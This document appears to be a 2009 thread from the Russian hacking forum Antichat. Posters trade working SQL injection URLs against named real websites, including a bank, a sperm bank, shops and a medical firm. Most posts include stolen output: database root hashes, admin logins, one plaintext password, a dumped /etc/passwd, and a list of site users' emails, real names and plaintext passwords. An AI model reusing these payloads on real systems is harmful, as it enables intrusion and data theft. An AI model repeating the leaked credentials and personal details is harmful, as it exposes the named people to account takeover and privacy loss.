Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
24.01.2009, 15:41
|
|
Участник форума
Регистрация: 09.03.2008
Сообщений: 193
Провел на форуме:
2140897
Репутация:
267
|
|
Искал книжку)
Сlasses.ru
Код:
http://www.classes.ru/books-colibri-description/-188084+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,version(),user(),database()),14,15,16,17,18--/
Тоже 5 ветка мускула
Сейчас просто соксов нет копать)Кто что надыбает,плиз стукните мне) |
|
|
24.01.2009, 16:28
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Банк спермы =)))
http://www.europeanspermbank.com/spermdonor/sperm_donor.php?donorId=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a3a,us ername,password,password2),10,11,12,13,14+from+tbl _member+limit+0,1--
login:kasholmes
pass:imogen
Выборка по юзерам
--------------------------
|
|
|
|
24.01.2009, 20:20
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980
Репутация:
930
|
|
seresmaria
Код:
http://seresmaria.hu/blogpl.php?id=-23+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6--
user(): root@localhost
database(): seres
version(): 5.0.32-Debian_7etch8-log
PR=4
mysql user:
debian-sys-maint
-------
mysql password:
AEBBCAE0B5458EF192DE7823AFC4EDD2BBFF0A24
логин и пасс от админки в соседней тему =)
компаниЯ Дельта Медикел
Код:
http://www.deltamedical.com.ua/includes/print.php?id=-24+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9--
user(): deltamedua_1@localhost
database(): deltamedua_db
version(): 5.0.45
тИЦ=40
PR=3
Код:
http://www.deltamedical.com.ua/includes/print.php?id=-24+union+select+1,2,3,concat(user_id,0x3a,user_login,0x3a,user_pass),5,6,7,8,9+from+users+limit+0,1--
1:eleanor:276a306b54b4dd5649640782bfeb3b09
|
|
|
|
24.01.2009, 20:46
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
http://www.mediaindex.ro/detalii_proprietari.php?id=-538+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT((S ELECT+CONCAT(TABLE_NAME,TABLE_SCHEMA)+FROM+INFORMA TION_SCHEMA.TABLES+LIMIT+1,1)),0x71),0x71)/*&subm=Cauta
версия 5-я
http://www.mediaindex.ro/admin/autentificare.php
админка
http://www.e-juridic.ro/articole/-monitorul-oficial-numarul-37-din-20-ianuarie-2009-2977+UNION+SELECT+1,2,3,4,5,6,7,8,9,AES_DECRYPT(AE S_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0 x2F2A2A2F,User()),0x71),0x71)+LIMIT+1,1.html
на мой взгляд интересная скуля
Database Version: 4.0.18
Database name: avocatul
User name: root@localhost
присутсвуют таблички
mysql.user
user
password
user
email
id
password
userid
http://www.e-juridic.ro/admin.php
Последний раз редактировалось Gorev; 24.01.2009 в 20:54..
|
|
|
|
24.01.2009, 21:29
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Шоп:
Код:
http://www.sprucedanddappa.net/shop.php?id=1+union+select+1,version()--&sid=1
Название таблици с юзерами подобрать не удалось, кто подберет, скиньте в ПМ плз!
----------------------------------------------------
The End! |
|
|
|
24.01.2009, 22:25
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
версия мускуль пятая и даже вроде мк выключены ;-)
5.0.24a-community-max-nt-log
jer029@65.182.101.165
jer029
https://www.jrogers.us/lintel/display.php?TopicId=2+union+select+1,user_name,3,4 ,pwd,6,7,8+from+users+limit+1,1/*
|
|
|
|
24.01.2009, 23:28
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Код:
http://www.sensualdaydreams.com/cast/cast.php?id=-22+union+select+1,2,version(),4,5,6,7/*
5.0.32-Debian_7etch6-log |
|
|
|
24.01.2009, 23:28
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Снова щопы:
www.cafeorinoco.com
Код:
http://www.cafeorinoco.com/shop.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13--
юзер/бд/версия мускула:
Код:
orinoco@localhost:orinoco:5.0.51a-log
Колонки из таблици discounts:
Код:
http://www.cafeorinoco.com/shop.php?id=-1+union+select+1,2,3,column_name,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name=0x646973636f756e7473--
Код:
idx
code
type
amount
deleted
---------------------------------------------------------
www.nobilistilia.ru
Код:
http://nobilistilia.ru/shop.php?ID=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
юзер/бд/версия мускула:
Код:
zonny@localhost:nobilistilia:5.0.75
Колонки из таблици baseusers:
Код:
http://nobilistilia.ru/shop.php?ID=-1+union+select+1,2,3,4,group_concat(column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.columns+where+table_name=0x626173657573657273--
Код:
ID_User
RecDate
RecAct
UsType
UsName
UsLogin
UsPassw
ID_User
RecDate
RecAct
UsType
UsName
UsLogin
UsPass
ID_User
RecDate
RecAct
UsType
UsName
UsLogin
UsPassw
-------------------------------------------
The End!
Последний раз редактировалось jokester; 25.01.2009 в 00:03..
Причина: 6 size совсем необязательно
|
|
|
|
25.01.2009, 00:14
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
А вот вам БАНК =)))
А вот вам банк в домене ru:
www.kbhmb.ru
Код:
http://www.kbhmb.ru/index.php?id=7+union+select+1,2,convert(concat_ws(0x3a,user,password)+using+latin1),4,5,6,7,8+from+mysql.user--
логин/пасс:
Код:
vasselect:*8BF7ACF013E0D295ADE08E3A755EFB4D5EA47343
Код:
vasinsert:*8FF7E1FC81B393BF0DBA4C7E3655194DF97D78E7
Код:
max:*832EB84CB764129D05D498ED9CA7E5CE9B8F83EB
Код:
root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
Смотрим file_priv:
Код:
http://www.kbhmb.ru/index.php?id=7+union+select+1,2,convert(file_priv+using+latin1),4,5,6,7,8+from+mysql.user--
Ура, на рута права Y
Читаем ect/passwd:
Код:
http://www.kbhmb.ru/index.php?id=7+union+select+1,2,convert(load_file('/etc/passwd')+using+latin1),4,5,6,7,8+from+mysql.user--
Все читается:
toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5:System &:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8:News Subsystem:/:/usr/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64  flogd privsep user:/var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin max:*:1001:1001  omozhakov Maxim:/home/max:/bin/sh bbush:*:1002:1002:Basil Bush:/home/bbush:/bin/csh mysql:*:1004:1004:User &:/home/mysql:/bin/sh oracle:*:71:71:Oracle:/usr/local/oracle7:/bin/sh ftp:*:14:5:Anonymous FTP Admin:/usr/home/ftp:/nonexistent vit:*:1005:1005:Ridinger Vitaly:/home/vit:/bin/sh skat:*:1006:1006:skat:/home/vit/skat:/bin/sh e-sbyt:*:1007:1006:e-sbyt:/home/vit/e-sbyt:/bin/sh gorgas:*:1008:1006:Gor Gas:/home/vit/gorgas:/bin/sh idea:*:1009:1006:OOO IDEA:/home/vit/idea:/bin/sh domserv:*:1010:1006:domserv:/home/vit/domserv:/bin/sh Можно есче сходить в коренную диру:
Код:
http://www.kbhmb.ru/index.php?id=7+union+select+1,2,convert(load_file('../../../')+using+latin1),4,5,6,7,8+from+mysql.user--
Ну вроде как все...дальше думаю сам разберешся 
---------------------------------------------------------
The End!
Последний раз редактировалось -m0rgan-; 25.01.2009 в 00:18..
|
|
|
|
25.01.2009, 11:22
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
http://www.oskar.ro/galerie.php?id=-825+union+select+1,2,3,CONCAT_WS(0x3a,Version(),Us er(),Database()),5,6,7--
version: 5.0.67-community-log
user : oskar_osky@localhost
database : oskar_oskar
Из всей базы интересуют только таблицы
useri и users
из первой не вывел ничего а из второй:
password:admin:data:email:id:nume
baubau:0:2008-09-01 17:43:59:fotoeseu@yahoo.com:1:Bogdan Apostol
baubau#11:0:2008-09-15 11:38:23:ionescu_danok@yahoo.com:2: Daniel Ionescu
alecsandra:0:2008-10-07 12:21:21:nathanail_antimi@yahoo.com:4:George Vintila
blabla:0:2008-10-13 23:26:58:cnimigean@gmail.com:5:Constantin Nimigean
universum:0:2008-10-23 15:41:04:b.simion2003@gmail.com:7:Belea Simion
nihilsinedeo:0:2008-11-01 14:02:55:mircea.teodorescu@gmail.com:9:mircea teodorescu
samir33:0:2008-11-01 21:17:47:horiat@gmail.com:10:Horia Tudor
giulestino:0:2008-11-02 22:10:05:t_horatiu@yahoo.com:12:Horatiu Tatar
master:0:2008-11-12 06:09:38:amihai22@yahoo.ca:14:adrian mihai
Последний раз редактировалось Gorev; 25.01.2009 в 11:28..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
